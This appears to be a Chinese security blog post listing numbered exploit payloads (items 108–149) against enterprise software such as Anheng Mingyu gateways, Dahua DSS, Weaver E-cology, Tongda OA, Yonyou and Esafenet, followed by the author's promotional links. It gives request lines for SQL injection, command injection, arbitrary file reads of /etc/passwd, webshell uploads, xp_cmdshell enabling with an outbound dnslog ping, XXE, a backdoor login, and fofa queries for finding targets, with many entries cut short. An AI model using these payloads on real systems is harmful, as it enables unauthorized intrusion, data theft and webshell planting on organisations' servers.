需要提前准备 2 个文件,一个 ashx 和一个 txt 文件
将这两个文件打包为 2.zip,然后起一个 http 服务提供给网站远程下载
然后访问?furl=http://你的公网服务器/2.zip
随后即可发现网站对该 zip 进行了下载和解压,这里可以预览 txt 格式文件获取 zippath 参
数的值
然后 ashx 文件的地址即为:
1 | http://x.x.x.x/cache/office/x.x.x.x.x/82308141956519700010097_486/2.ashx |
108、安恒明御 SQL注入
1 | /caztbweb/VisitorWeb/VisitorWeb_XMLHTTPaspx?ParentCode=1' |
109、安恒明御安全网关rce
1 | GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+" |
路径:http://www.example.com/test.txt
直接命令执行返回root
110、安恒明御安全网关远程代码执行漏洞
首先发送get请求:
1 | https://localhost/sslvpn/sslvpn_client.php?client=logoImg&img=6drcdfs34c1h /tmp || whoami | tee /etc/hosts /usr/local/webui/webui/images/basic/login/main_logo21.txt || ls |
请求完毕后会将img后面的参数再页面中进行回显:
1 | 6drcdfs34c1h /tmp || whoami | tee /etc/hosts /usr/local/webui/webui/images/basic/login/main_logo21.txt || ls |
然后再次发送下面的get请求即可得到命令 的执行结果
1 | https://localhost/webui/images/basic/login/main_logo21.txt |
111、安恒明御安全网关远程代码执行漏洞
漏洞描述:信息安全管理系统(ISMS)是IDC/ISP业务经营者建设的具有基础数据管理、访问日志管理
信息安全
管理等功能的信息安全管理系统,该漏洞可未授权的情况下直接执行任意命令
相关信息:
1 | /user_management/sichuan_login |
请求体:
1 | loginname=sysadmin&ticket= |
112、大华 DSS 视频管理平台任意文件读取漏洞
1 | /portal/itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd |
113、大华 DSS 视频管理平台远程命令执行
1 | POST /portal/login_init.action HTTP/1.1 |
114、大华 ICC 智能物联综合管理平台后门用户
使用账户 justForTest 登陆,密码任意,即可进入后台
115、大为 lnnojet 知识产权协同创新管理系统管理员密码重置
访问下列路径直接进入密码重置界面
1 | http://*.*.*.*/resetPwd.html?guid=IWBI9HveWf01GlDm+je0Ec+qvHyI7F5bjy3kRC2uESwC0+KPmTxUsgHqj+lUuY0F061yruzA+jkZFb9hhNqPhw%3D%3D |
116、泛微 E-Mobile Download.jsp 远程代码执行
1 | /mobile/plugin/Download.jsp?sessionkey=1' EXEC sp_configure 'show advanced options',1 RECONFIGURE EXEC sp_configure 'xp_cmdshell',1 RECONFIGURE exec master..xp_cmdshell'ping 4a9c47b1.dnslog.click |
117、泛微历史sql漏洞
1 | 影响版本为泛微oa9.0 |
118、华测监测预警系统 任意文件读取漏洞
1 | POST /Handler/FileDownLoad.ashx HTTP/1.1 |
119、华测监测预警系统 数据库泄露漏洞
1 | /web/Report/Rpt/Config/Config.xml |
120、金蝶 EAS 系统存在目录遍历漏洞
1 | /appmonitor/protected/selector/server_file/files?folder=C:%5C%5C&suffix= |
121、蓝凌 eis 8.0 前台任意文件上传
1 | POST /eis/service/api.aspx?action=saveImg HTTP/1.1 |
122、蓝凌oa文件上传
1 | # 蓝凌 |
123、绿盟ads文件上传
1 | POST /postrev.php HTTP/1.1 |
124、明源ERP存在SQL时间盲注
1 | relative: req0 && req1 |
125、企望制造 ERP comboxstore.action 远程命令执行漏洞
1 | POST /mainFunctions/comboxstore.action HTTP/1.1 |
126、契约锁电子签章平台远程命令执行漏洞
1 | POST /captcha/%2e%2e/template/html/add HTTP/1.1 |
127、赛思 SuccezBl前台任意文件上传
1 | POST /succezbi/sz/commons/form/file/uploadChunkFile?guid=../tomcat/webapps/ROOT/&chunk=ss.jsp HTTP/1.1 |
128、深信服SG上网优化管理系统 catjs.php 任意文件读取漏洞
1 | POST /php/catjs.php |
129、契约锁电子签章平台远程命令执行漏洞
1 | POST /formservice?service=workflow.sqlResult HTTP/1.1 |
130、时空智友企业流程化管控系统 formservice 文件上传漏洞
1 | POST /formservice?service=attachment.write&isattach=false&filename=acebe1BA7BC18dB4.jsp HTTP/1.1 |
上传成功后返回shell文件名
shell所在路径为:/form/temp/{返回的文件名}
如 Shell 地址:/form/temp/202308154fkbyxm20fpxwy0h_acebe1BA7BC18dB4.jsp
131、时空智友企业流程化管控系统 login 文件读取漏洞
1 | POST /login HTTP/1.1 |
132、通达 OA 11.10 getdata 远程命令执行漏洞
1 | POST /general/appbuilder/web/portal/gateway/getdata?activeTab=%E6%88%91%27,1=%3Eeval($_POST[x]));/*&id=19&module=Carouselimage HTTP/1.1 |
133、万户 ezOFFICE 任意文件上传漏洞
1 | Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,fil;q=0.6 |
134、亿赛通 ClientAjax 任意文件下载漏洞
1 | POST /CDGServer3/ClientAjax HTTP/1.1 |
135、亿赛通 DecryptApplicationService2任意文件上传
1 | POST /CDGServer3/DecryptApplicationService2?fileId=../../../Program+Files+(x86)/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/12345.jsp HTTP/1.1 |
136、亿赛通 uploadFileFromClientServiceForClient任意文件上传漏洞
1 | POST /CDGServer3/UploadFileFromClientServiceForClient?AHECJIIACHMDAPKFAPLPFJPJHAHIDMFNKENDCLKLHFEKNDMAHGHOJBPEBEBCNIODHIKOBGFOMCPECDMKOHHIKOIPOPMMIOJDEACILAMPMLNLMELAMHAGGJMDLBCGCECCPKMMEIOKCBDGKHPDPFMLNPEKJHDEHNHFHILECBAJELDJNDBAEHOIIKDMHGOEHBIBHCAMDBBLHJGNCCPKDGLABEFHOKDPAKDCMIOHIFJAGCBPOMIKLMGBAGCNBGEGNKGABCOKEIJCMOMKEAKDALJEHMEIPHLLBJPCJIIPAFACIJKGABAFFDEDCAHOALGIGLKBFIFBFCGGBJFOGEGG HTTP/1.1 |
137、亿赛通电子文档安全管理系统 syn_user_policy 任意文件上传
1 | POST /CDGServer3/fileType/importFileType.do?flag=syn_user_policy HTTP/1.1 |
138、易思软件-智能物流无人值守系统 ImportReport 任意文件上传
1 | POST /Sys_ReportFile/ImportReport?encode=health HTTP/1.1 |
139、用友 NC uploadControl_uploadFile 任意文件上传
先获取 cookie:url+/mp/loginxietong?username=admin
1 | POST /mp/uploadControl/uploadFile HTTP/1.1 |
Webshell 地址 /mp/uploadFileDir/testpoc.jsp
140、用友 U8 CRM 客户关系管理系统 getemaildata.php 任意文件读取漏洞
1 | /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini |
141、通达 OA 11.10 getdata 远程命令执行漏洞
1 | # app="用友-U8CRM" |
142、通达 OA 11.10 getdata 远程命令执行漏洞
1 | POST /services/operOriztion HTTP/1.1 |
143、用友时空 KSOA QueryService sql 注入漏洞
1 | /servlet/com.sksoft.bill.QueryService?service=query&content=SELECT%20name%20FROM%20sys.databases; |
144、在野0day nginxWebUI 远程代码执行漏洞
1.payload(命令执行1):
1 | http://localhost:8080/AdminPage/conf/reload?nginxExe=calc%20%7C |
2:payload(命令执行2):
1 | POST /AdminPage/conf/check HTTP/1.1 |
3.payload:
1 | //第一步设置属性 |
145、通达 OA 11.10 getdata 远程命令执行漏洞
利用 CB1 生成 hex 反序列化数据,替换 POC 中的 HEX
1 | POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1 |
然后再 Get 访问/mobile_portal/api/systemLog/pns/loadLog/app.log
146、通达 OA 11.10 getdata 远程命令执行漏洞
1 | POST /seeyon/wpsAssistServlet HTTP/1.1 |
147、泛微E-CologyXXE
poc1
1 | POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1 |
poc2
1 | /rest/ofs/deleteUserRequestInfoByXml/ |
Exp1
1 | POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1 |
Exp2
1 | POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1 |
148、H3C多系列路由器存在前台RCE漏洞
fofa: app=”H3C-outer”
1 | POST /goform/aspForm HTTP/ 1.1 |
149、帆软报表系统任意文件读取漏洞
1 | WebReport /ReportServer ?op-chart&cmd-get_geo_json&resourcepath-privilege.xml |
3- 结束语
- 需要技术文章,记得将ycc77.com 添加到书签栏哦~
- 需要资源,记得将ycc77.cn 添加到书签栏哦~
- QQ交流群:660264846
- B站: 疯狂的杨CC
- 抖音: 疯狂的杨CC
- 快手: 疯狂的杨CC
- 公众号:SGY安全
- 91: 疯狂的杨CC
- p站: 疯狂的杨CC
All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.
Comments